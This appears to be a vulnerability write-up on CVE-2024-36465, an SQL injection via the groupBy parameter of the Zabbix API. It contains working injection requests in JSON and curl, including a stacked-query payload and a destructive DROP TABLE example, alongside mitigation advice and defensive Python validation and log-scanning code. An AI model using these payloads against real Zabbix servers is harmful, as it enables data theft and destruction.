In June 2024, a severe security vulnerability—CVE-2024-36465—was publicly disclosed for Zabbix, a popular open-source monitoring tool used to track the status of servers and network hardware. This vulnerability allows any regular Zabbix user with API access to execute arbitrary SQL commands on the backend database, potentially compromising all data stored by Zabbix.
What is CVE-2024-36465?
CVE-2024-36465 is an SQL Injection vulnerability present in Zabbix servers, specifically in the file include/classes/api/CApiService.php.
The flaw resides in how the software handles user-provided input for the groupBy parameter. Without proper sanitization or validation, attackers can inject malicious SQL statements and alter the query logic, which can lead to data theft, data modification, or even total compromise of the server.
Affected Versions: Zabbix 6.x and possibly some earlier, unpatched versions.
- Zabbix official advisory: Zabbix Security Advisory ZBX-24464
- NVD entry: CVE-2024-36465
How Does the Vulnerability Work?
The vulnerable parameter is groupBy when used in specific API calls. Zabbix developers failed to properly sanitize values passed to groupBy, directly including them in SQL statements.
Inside CApiService.php, somewhere in request processing, the vulnerable pattern can be pictured as
// PSEUDOCODE! Illustrates the flaw, not the literal Zabbix source.
$groupBy = $_REQUEST['groupBy'];   // user-controlled value taken straight from the request
$sql = "SELECT * FROM monitored_objects GROUP BY $groupBy";   // spliced into SQL unvalidated
$db->query($sql);   // whatever the user sent is now part of the executed statement
If groupBy is 'status, hostid', the query is fine.
If it is 'status; DROP TABLE users;--', the result is a disaster.
Example Exploit: How a Regular User Can Inject SQL
Assume you are a standard user with API access (for automation, dashboards, etc.).
When making an API request to Zabbix, you normally POST JSON like this
{
  "jsonrpc": "2.0",
  "method": "problem.get",
  "params": {
    "groupBy": "eventid"
  },
  "auth": "your_api_token",
  "id": 1
}
Now, inject SQL like this
{
  "jsonrpc": "2.0",
  "method": "problem.get",
  "params": {
    "groupBy": "eventid; SELECT version()--"
  },
  "auth": "your_api_token",
  "id": 2
}
This might result in Zabbix executing
SELECT ... FROM ... GROUP BY eventid; SELECT version()--
With curl
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "method": "problem.get",
    "params": {
      "groupBy": "eventid; SELECT version()--"
    },
    "auth": "your_api_token",
    "id": 2
  }' \
  http://<your.zabbix.url>/zabbix/api_jsonrpc.php
Possible server errors—sometimes error output reveals data!
- If you try groupBy: eventid; DROP TABLE users;-- you could delete key tables (WARNING: This is destructive. Don't do this on production!)
Mitigation Steps
1. Update Zabbix Immediately
Patched releases are available for Zabbix 6.x and later. Download updates from:
https://www.zabbix.com/download
2. Restrict API Access
Only allow API access to trusted users. Limit network exposure of API endpoints.
3. Input Monitoring
If you have a WAF or intrusion detection system, block or alert on unexpected semicolons or SQL keywords in API input.
4. Review Permissions
Audit all Zabbix users with API access—disable accounts you don’t need.
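The two defensive pieces above, the server-side check the pseudocode lacks and the input monitoring of step 3, share the same core: decide whether a groupBy value is a legitimate column list. The following Python is an added example written for this article, not Zabbix code and not the actual upstream patch. It assumes a hypothetical allowlist of column names (ALLOWED_GROUP_BY) and constructed JSON-RPC request bodies standing in for an API log; both are made up for the demonstration.

```python
import json
import re

# Hypothetical allowlist of columns a grouped query may use. Constructed for
# this example; a real deployment would derive it from the API schema.
ALLOWED_GROUP_BY = {"eventid", "objectid", "clock", "severity", "hostid", "status"}

# A legitimate groupBy value is a comma-separated list of plain identifiers.
_IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def validate_group_by(value, allowed=ALLOWED_GROUP_BY):
    """Return the validated column names, or raise ValueError.

    This is the check missing from the vulnerable pseudocode: the request value
    is never spliced into SQL; each name must look like an identifier AND be in
    the allowlist, so no statement terminator or comment can survive."""
    if not isinstance(value, str) or not value.strip():
        raise ValueError("groupBy must be a non-empty string")
    columns = []
    for part in value.split(","):
        name = part.strip()
        if not _IDENT_RE.fullmatch(name) or name not in allowed:
            raise ValueError(f"groupBy column not permitted: {name!r}")
        columns.append(name)
    return columns


def is_valid_group_by(value, allowed=ALLOWED_GROUP_BY):
    """Boolean convenience wrapper around validate_group_by."""
    try:
        validate_group_by(value, allowed)
        return True
    except ValueError:
        return False


def build_group_by_sql(value, allowed=ALLOWED_GROUP_BY):
    """Hardened counterpart of the pseudocode: only validated names reach SQL."""
    cols = validate_group_by(value, allowed)
    return "SELECT * FROM monitored_objects GROUP BY " + ", ".join(cols)


def scan_api_log(lines):
    """Mitigation step 3 as code: flag request bodies whose params.groupBy
    fails validation. Each line is assumed to be one logged JSON-RPC body.
    Returns a list of (line_number, reason) tuples."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        try:
            req = json.loads(line)
        except json.JSONDecodeError:
            findings.append((lineno, "unparseable request body"))
            continue
        params = req.get("params") or {}
        if "groupBy" not in params:
            continue  # parameter absent: nothing to check for this method
        try:
            validate_group_by(params["groupBy"])
        except ValueError as exc:
            findings.append((lineno, f"{req.get('method')}: {exc}"))
    return findings


# Constructed sample log (not real Zabbix output): benign requests, the
# payload shown earlier in this article, and a column outside the allowlist.
SAMPLE_LOG = [
    '{"jsonrpc": "2.0", "method": "problem.get", "params": {"groupBy": "eventid"}, "auth": "x", "id": 1}',
    '{"jsonrpc": "2.0", "method": "problem.get", "params": {"groupBy": "eventid; SELECT version()--"}, "auth": "x", "id": 2}',
    '{"jsonrpc": "2.0", "method": "problem.get", "params": {"groupBy": "status, hostid"}, "auth": "x", "id": 3}',
    '{"jsonrpc": "2.0", "method": "problem.get", "params": {"groupBy": "password"}, "auth": "x", "id": 4}',
    '{"jsonrpc": "2.0", "method": "host.get", "params": {"output": "extend"}, "auth": "x", "id": 5}',
]

if __name__ == "__main__":
    for lineno, reason in scan_api_log(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```

Running the module flags lines 2 and 4 of the constructed log. The design point is that the same allowlist serves both as the fix and as the detection rule: because the set of legitimate column names is small and known, rejecting anything that is not on it is both tighter and easier to maintain than a blocklist of semicolons and SQL keywords, which is what a generic WAF rule from step 3 would have to rely on.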
Conclusion
CVE-2024-36465 is a dramatic example of how one oversight in input validation can allow a regular Zabbix user to wreak havoc on your monitoring environment. The vulnerability is easy to exploit, requiring no special privileges or hard-to-obtain credentials. If you run Zabbix and expose its API, you must update now!
Links & Further Reading
- Zabbix Official Security Advisory (ZBX-24464)
- CVE-2024-36465 at NVD
- Zabbix Downloads (for patch)
- OWASP SQL Injection Cheat Sheet
Timeline
Published on: 04/02/2025 06:15:34 UTC
Last modified on: 04/02/2025 14:58:07 UTC